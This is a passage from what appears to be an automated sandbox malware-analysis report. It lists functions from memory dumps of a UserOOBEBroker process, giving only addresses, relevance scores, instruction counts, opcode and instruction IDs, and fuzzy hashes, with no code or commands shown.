                                                                                                                            • Opcode ID: 5365914e0330ec8f627b01ed83b4d6189d2fceb583ca730dda50c2e44aa23147
                                                                                                                            • Instruction ID: c47af2013d25e3c20d04ce1fa80ad1fa6ba208f38af5d69bacecdec098b0d0d1
                                                                                                                            • Opcode Fuzzy Hash: 5365914e0330ec8f627b01ed83b4d6189d2fceb583ca730dda50c2e44aa23147
                                                                                                                            • Instruction Fuzzy Hash: B991F721B1DE4D0FEB98EA6C88B667573C2EF94342F0542B9E40DC71E7DD38A9458781
                                                                                                                            Function 00007FFD9B782111 Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e7a7e6e79b2a22a0d11f4b9c09211fc97df8620b71d3386b1b7f309829c44ea
                                                                                                                            • Instruction ID: a18def41eed32bc62a550dd3bff6b3876f1bf4380462ae9b6a927b01ea7ef64b
                                                                                                                            • Opcode Fuzzy Hash: 9e7a7e6e79b2a22a0d11f4b9c09211fc97df8620b71d3386b1b7f309829c44ea
                                                                                                                            • Instruction Fuzzy Hash: 7E313831A0DA4D8FE729DB58C8A47F53791EB95311F0602BED419C72F2DA686D418B81
                                                                                                                            Function 00007FFD9B75116D Relevance: .1, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: af3a14fd297dadd58cf0806359ae440d60389a37238ef6ddaf22946fe62a2ae6
                                                                                                                            • Instruction ID: df3561bb68ad194245d7c53e5b8daf27ee2811dc49892942eeb96c9211319288
                                                                                                                            • Opcode Fuzzy Hash: af3a14fd297dadd58cf0806359ae440d60389a37238ef6ddaf22946fe62a2ae6
                                                                                                                            • Instruction Fuzzy Hash: 6231A931A0964D8FDB55EBA8C865DBD77F0FF26300F0506FAC00AD75B2DA68A941C750
                                                                                                                            Function 00007FFD9B78D621 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: eee3413b526f722b3ec4a99d91ac0aea3f9c71087bee257a652736fb25111bbf
                                                                                                                            • Instruction ID: 8e7f68a11de4c91aa7a740b1f60b1776ecba13157adde87aa905c8ae97d2878a
                                                                                                                            • Opcode Fuzzy Hash: eee3413b526f722b3ec4a99d91ac0aea3f9c71087bee257a652736fb25111bbf
                                                                                                                            • Instruction Fuzzy Hash: B0210232F09A5D4FEB64DA68D8642ED77E1EB88311F0506BAD019D32E1DA389E4187C0
                                                                                                                            Function 00007FFD9B750C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6e5f036a23f496bf6eb0487f7733b785f5abd5e9ff219fe57e2ddd31d7bb5d54
                                                                                                                            • Instruction ID: 1a1af83695c867b5f91984fb12c8c53fa0a8808c7327c067cf9a8265e31af2cf
                                                                                                                            • Opcode Fuzzy Hash: 6e5f036a23f496bf6eb0487f7733b785f5abd5e9ff219fe57e2ddd31d7bb5d54
                                                                                                                            • Instruction Fuzzy Hash: 4B21E736B0D38D9FE722A7E898650EC7B60EF43320F1546B7D048DB1E3DA6826478795
                                                                                                                            Function 00007FFD9B750C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b0c2ffa6665a2df569256c7fbe9d791df5440899799b91f48487b717e2f3720
                                                                                                                            • Instruction ID: faeafb706778a015d3b18950af121ad0ab43dea44d1751fe1d0972b0ac955fa4
                                                                                                                            • Opcode Fuzzy Hash: 3b0c2ffa6665a2df569256c7fbe9d791df5440899799b91f48487b717e2f3720
                                                                                                                            • Instruction Fuzzy Hash: 44119E35A0E38D9FE722DBA888650ED7BB0AF43610F0646B7D084DB1E2D974264A8780
                                                                                                                            Function 00007FFD9B78AD4D Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 68be5d8b4c372793b2558010082ab363ae76627cda6509e6cb63ad0132741089
                                                                                                                            • Instruction ID: 1e15b953974290f305f86b589a7be54e6bed5912873dbeebb519087a323a3030
                                                                                                                            • Opcode Fuzzy Hash: 68be5d8b4c372793b2558010082ab363ae76627cda6509e6cb63ad0132741089
                                                                                                                            • Instruction Fuzzy Hash: 94018171B0AF0D4FEB95E79898A67F9B3D2EF58352F050176E40CC32A3DE2468458741
                                                                                                                            Function 00007FFD9B750C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 49936b6887795164c907375ee1043e405fcf8e3bb14fd87297b1444699e50a44
                                                                                                                            • Instruction ID: 764f6ec27531d70b7f22d004b3e76a1536ab465e7ff752a3a120844df79a9697
                                                                                                                            • Opcode Fuzzy Hash: 49936b6887795164c907375ee1043e405fcf8e3bb14fd87297b1444699e50a44
                                                                                                                            • Instruction Fuzzy Hash: 45018035A0E38D8FE712DBA4886109C7FB0AF43700F1646E7D044DB1E2DA746A468741
                                                                                                                            Function 00007FFD9B77E1D5 Relevance: .0, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66a5817e742d9225150dfe5d483b51eb0c706631316ac3bdaf5a13d1346d816e
                                                                                                                            • Instruction ID: 07eb4146ade4b08aeefd0aab09a9b0c8ac1cb7f63368c01282c8f5e757da5e8a
                                                                                                                            • Opcode Fuzzy Hash: 66a5817e742d9225150dfe5d483b51eb0c706631316ac3bdaf5a13d1346d816e
                                                                                                                            • Instruction Fuzzy Hash: 01F0A753A0EFC90FD365C66C58E61907FD1DB99260B4E02EBD48CC71E7E88859564351
                                                                                                                            Function 00007FFD9B750C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00bb79627ce4cc3d657452bed5adbb0d1c07d38387a2acc6d886136808c16a50
                                                                                                                            • Instruction ID: a2c3fe6029a1f6146dec0c41b54f228449e13c5c2fe626109115673607463086
                                                                                                                            • Opcode Fuzzy Hash: 00bb79627ce4cc3d657452bed5adbb0d1c07d38387a2acc6d886136808c16a50
                                                                                                                            • Instruction Fuzzy Hash: 6D017C34E0E38D9FE722DBA488640AD7FB0AF03700F1546E7D044DB2A6DA786A458741
                                                                                                                            Function 00007FFD9B78A9D9 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 08160cbf032374ae9cd85adb820dc827688597489ccf39b1adcbe36d234afb8d
                                                                                                                            • Instruction ID: 3ba6d96ca373a907103ad4dfe84825b2fcd9e9363ddd887cde927556bd9ea639
                                                                                                                            • Opcode Fuzzy Hash: 08160cbf032374ae9cd85adb820dc827688597489ccf39b1adcbe36d234afb8d
                                                                                                                            • Instruction Fuzzy Hash: 1CF0E521B5D7C40FCB1A562958654617BF1CF9B20534A41FBD496CB2E3DD18AC858391
                                                                                                                            Function 00007FFD9B755E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9f87ef061279de0a954c7a4ab7714839ef99fd80693fb3254d07af3edf7cdfcf
                                                                                                                            • Instruction ID: 87a8c96b0ce0ec63448d6f93f29caa20a6531feb19abdb22c6f3279c1cc1661c
                                                                                                                            • Opcode Fuzzy Hash: 9f87ef061279de0a954c7a4ab7714839ef99fd80693fb3254d07af3edf7cdfcf
                                                                                                                            • Instruction Fuzzy Hash: 12F0C231648A0A8FCB54DF08C894FA973B1FB98311F1586A9D00ED7260DA74EA85DF81
                                                                                                                            Function 00007FFD9B764B7A Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction ID: 9aec045372e059132930c7e7f78aed666e650d7bce46698836017d2841428c5c
                                                                                                                            • Opcode Fuzzy Hash: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction Fuzzy Hash: 86F0B430B0E21E8FEA74AE88D4605B83350EF54310F020379D41EC31FBCD28AA035285
                                                                                                                            Function 00007FFD9B78B7B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d910dbd57608b0abda037d5b4e092c3ef62f7276750041a1f9a72b9373180bf
                                                                                                                            • Instruction ID: 3fc26efb41ea21597473b492dc982bc38c751d7889ca7c30a5cca1327ef75f52
                                                                                                                            • Opcode Fuzzy Hash: 5d910dbd57608b0abda037d5b4e092c3ef62f7276750041a1f9a72b9373180bf
                                                                                                                            • Instruction Fuzzy Hash: 89F0E526B586024FD308BB3CE8B68F83390EF5222674840F6E04ECE1E7DE29D4488A41
                                                                                                                            Function 00007FFD9B77CB49 Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 51f3c7e256b92e4705a4fc7e29e1d2a74564b146bf7ea8aa7a63253ae12bd6fe
                                                                                                                            • Instruction ID: f6c8a3eb7c5cda0199f8ef649c846817f0739b2c7cc1187b7422e2492db01605
                                                                                                                            • Opcode Fuzzy Hash: 51f3c7e256b92e4705a4fc7e29e1d2a74564b146bf7ea8aa7a63253ae12bd6fe
                                                                                                                            • Instruction Fuzzy Hash: D7F0396096D7C54FC702AB3888644247FF0EF1710978A02EBD8C9CA4B3DA19884AC312
                                                                                                                            Function 00007FFD9B782CE9 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d9a2094f2d8b6685660e773d458ab3562149265bbdb5a1560ed5c07b140fd65
                                                                                                                            • Instruction ID: 4bc0b4ca295e60b962178d6091dcb4e2a5ab8a4765626c407b31a3bb1d2156b4
                                                                                                                            • Opcode Fuzzy Hash: 9d9a2094f2d8b6685660e773d458ab3562149265bbdb5a1560ed5c07b140fd65
                                                                                                                            • Instruction Fuzzy Hash: 33E0922070AB890FC70E963848685607FA1EF6610178942EBC445CF1E3DD19DC89C751
                                                                                                                            Function 00007FFD9B77E279 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 56720f9561f3326d6ca09ea0d49ffe7035577743b517bc5fad30eb9a1ececbca
                                                                                                                            • Instruction ID: ebc221aa116818720a8d9470321270875e18592448059e6f77a2adb843b7b3cd
                                                                                                                            • Opcode Fuzzy Hash: 56720f9561f3326d6ca09ea0d49ffe7035577743b517bc5fad30eb9a1ececbca
                                                                                                                            • Instruction Fuzzy Hash: E8E09220B597C80FC70E963848645607FA1EF5710678952FAC845CB1D3E919DC89C751
                                                                                                                            Function 00007FFD9B7879D5 Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1f1b36cf6e6d68fd3653b6a98a1aa01873a78dde0981d82731e6bbd0d9db0483
                                                                                                                            • Instruction ID: a6a6bd39aaf03454348f52f04105c296cb11034421ac7d5e0170d7e89082d67c
                                                                                                                            • Opcode Fuzzy Hash: 1f1b36cf6e6d68fd3653b6a98a1aa01873a78dde0981d82731e6bbd0d9db0483
                                                                                                                            • Instruction Fuzzy Hash: 62E02B22B0EB845FD3194A384CB54643B51CF2B12671B01A7D016CB5F3D8159D44C341
                                                                                                                            Function 00007FFD9B78AA69 Relevance: .0, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f4ef3649280878cc5f3aaf52da19a1819bd6fc5e1659fe3c3163c55e0b28476d
                                                                                                                            • Instruction ID: e3d1a1da7d9074f4fb116f113377fb06fd6e116f2030fb6ca87564f11e9e5bbb
                                                                                                                            • Opcode Fuzzy Hash: f4ef3649280878cc5f3aaf52da19a1819bd6fc5e1659fe3c3163c55e0b28476d
                                                                                                                            • Instruction Fuzzy Hash: 29E08621A597C44FCB0EA73888A59503FB0DF6B11178A40EAD049CF1F3D51DDC49C751
                                                                                                                            Function 00007FFD9B779599 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 31e7add6a699482644e09eac890c158adb20630c39a971166cf3560001b36da7
                                                                                                                            • Instruction ID: faaa01827a3640a0992ef8394f799f36f8611ed61ef1185c30327ee6dd8f7827
                                                                                                                            • Opcode Fuzzy Hash: 31e7add6a699482644e09eac890c158adb20630c39a971166cf3560001b36da7
                                                                                                                            • Instruction Fuzzy Hash: 2FE08631A497844FCB0AAB288CA99503BB0EF6A215B8A00D7C005CB5B3E61DDC49C701
                                                                                                                            Function 00007FFD9B787989 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c964d85cdf1dee93cba477832f5b26ba886b4bc37cd490a501a1f3da30a6a0c8
                                                                                                                            • Instruction ID: 41a6ac8204fcf201e5012ef7529e6b21993cdb5295be08fadcd5c78c61696277
                                                                                                                            • Opcode Fuzzy Hash: c964d85cdf1dee93cba477832f5b26ba886b4bc37cd490a501a1f3da30a6a0c8
                                                                                                                            • Instruction Fuzzy Hash: 6CE01A2194F7C08FC74B9B3588A88447F71AE1721174A51EBC086CF5B3EA299849C712
                                                                                                                            Function 00007FFD9B78D959 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c5da26b0122ceb7ea3b42c453a36d5338c0b8dfb9c39f322118e7ad536636e7
                                                                                                                            • Instruction ID: adbb791bfe44542853f887c2af0a5f1d3afa8ffe0c0f8fa97680d4350e7a0e40
                                                                                                                            • Opcode Fuzzy Hash: 5c5da26b0122ceb7ea3b42c453a36d5338c0b8dfb9c39f322118e7ad536636e7
                                                                                                                            • Instruction Fuzzy Hash: 69E04F2164A7C00FC70E963488658543FA09F5711178A40EBC045CF2F3D519D848C752
                                                                                                                            Function 00007FFD9B78A540 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B78A4B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B751DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction ID: 4eaf232e06f4fc78891fe36b25e7d65f0a7da15d4abc5d584ad1dfd486b932c8
                                                                                                                            • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction Fuzzy Hash: 88E01A74F0D61E87FB68A2C4C8617E97265EB88300F150678DA1E933E5CEA8AE428655
                                                                                                                            Function 00007FFD9B78D8D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bbf905f8e019aeb8e37b9ff8eccfe037cb1c082170d651a141763345b37719eb
                                                                                                                            • Instruction ID: fd7852c4a2d2227a7354cd72b8eb8f8542edebb1600eaba70fdc1156c538e655
                                                                                                                            • Opcode Fuzzy Hash: bbf905f8e019aeb8e37b9ff8eccfe037cb1c082170d651a141763345b37719eb
                                                                                                                            • Instruction Fuzzy Hash: 1CE04F2194F7C04FC70B973488B88547F60DF5B21178A41EEC085CF5B3EA2D8849C702
                                                                                                                            Function 00007FFD9B78CC29 Relevance: .0, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2c3873b2e80135705462e9ac236b10f5d5fd4c24e244cce761d253de320855b8
                                                                                                                            • Instruction ID: ac4e1c4b3cc89a29aa9ded6186f70ff1c5697cd6e9265ba552848f553e86a447
                                                                                                                            • Opcode Fuzzy Hash: 2c3873b2e80135705462e9ac236b10f5d5fd4c24e244cce761d253de320855b8
                                                                                                                            • Instruction Fuzzy Hash: E0E0EC2154E7C44FC70A9B2488A5D553FB0AF5711178A41EBC449CF6B3D6599C88C752
                                                                                                                            Function 00007FFD9B781AF0 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B78B7D8 Relevance: .0, Instructions: 17COMMON
